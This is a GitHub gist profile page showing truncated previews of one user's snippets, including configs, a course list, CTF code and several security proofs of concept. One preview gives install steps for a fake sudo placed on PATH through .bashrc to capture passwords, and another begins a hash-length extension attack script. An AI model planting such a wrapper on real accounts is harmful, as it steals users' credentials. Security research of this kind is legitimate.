Skip to content

Instantly share code, notes, and snippets.

View ldionmarcil's full-sized avatar

Louis Dion-Marcil ldionmarcil

View GitHub Profile
[ldionmarcil:~]$ sudo cat /etc/netctl/wlp3s0-Eduroam
[sudo] password for ldionmarcil:
Description='A wireless connection using a custom network block configuration'
Interface=wlp3s0
Connection=wireless
Security=wpa-configsection
IP=dhcp
DNS=(8.8.8.8 8.8.4.4)
WPAConfigSection=(
'ssid="Eduroam"'
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = git@github.com:ldionmarcil/blindr-backend.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
* Cheminement
| Sigle | Description | Complété? | Type |
|--------+-----------------------------------------------------------------------+-------------+----------------|
| PRE010 | Initiation au milieu industriel (1 cr.) | Oui | Général |
| CHM131 | Chimie et matériaux (4 cr.) | Oui | Général |
| COM115 | Communication interculturelle (3 cr.) | Oui | Général |
| ING150 | Statique et dynamique (4 cr.) | Oui | Général |
| MAT144 | Introduction au mathémathiques du génie (0 cr.) | Oui | Général |
| MAT145 | Calcul différentiel et intégral (4 cr.) | Oui | Général |
| GIA400 | Analyse de rentabilité de projets (3 cr.) | | G
Site web de SerreÉTS
=============
Code pour le site web de [SerreÉTS](http://startbootstrap.com/templates/freelancer/) utilisant Jekyll.
### Références
Fork initial de [freelancer-theme](https://github.com/jeromelachaud/freelancer-theme)

Keybase proof

I hereby claim:

  • I am ldionmarcil on github.
  • I am ldionmarcil (https://keybase.io/ldionmarcil) on keybase.
  • I have a public key whose fingerprint is 86AE 960F 8562 6673 E5CA EDB5 F49E 48A7 0E61 E739

To claim this, I am signing this object:

@ldionmarcil
ldionmarcil / hashlength.py
Created November 27, 2014 00:17
Kijiji hash-length extension
# non functional - validation
import requests
import hashpumpy
import binascii
import base64
import time
import bs4
session = requests.Session()
headers = {"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0","Connection":"keep-alive","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"}
@ldionmarcil
ldionmarcil / PublicKeyManager.java
Created August 25, 2014 04:40
XSS POC diamondhunt MMO
// Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.geocities.com/kpdus/jad.html
// Decompiler options: packimports(3)
// Source File Name: PublicKeyManager.java
import java.io.PrintStream;
import java.security.*;
import java.security.spec.X509EncodedKeySpec;
import javax.crypto.Cipher;
@ldionmarcil
ldionmarcil / sudo.sh
Last active July 28, 2025 14:43
transparent sudo wrapper to dump passwords, for when bruteforcing shadow files just doesn't cut it.
# Installation:
# Append the following line to the target user's .bashrc file by running
# the following command:
# $ echo "export PATH=~/.payload:$PATH" >> ~/.bashrc
#
# Then, create ~/.payload/sudo and paste the following code in the file.
# Don't forget to make the bash script executable by issuing the following
# command:
#
# $ chmod a+x ~/.payload/sudo
@ldionmarcil
ldionmarcil / gist:144deb40726a3b7c1d66
Last active July 15, 2016 22:09
Proof of concept ZAP wrapper for wpscan
/*
* Zed Attack Proxy (ZAP) and its related class files.
*
* ZAP is an HTTP/HTTPS proxy for assessing web application security.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
@ldionmarcil
ldionmarcil / CSAW2013MISC300
Created September 22, 2013 22:23
CSAW CTF 2013 code for Misc 300 "Life"
#Hacked together, don't expect quality code!
#Author: Louis Dion-Marcil
#Note: Borrowed code from StackExchange's CodeReview user, Lewis
#http://codereview.stackexchange.com/questions/25772/game-of-life-in-python
import socket, re
host = "128.238.66.216"
port = 45678
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))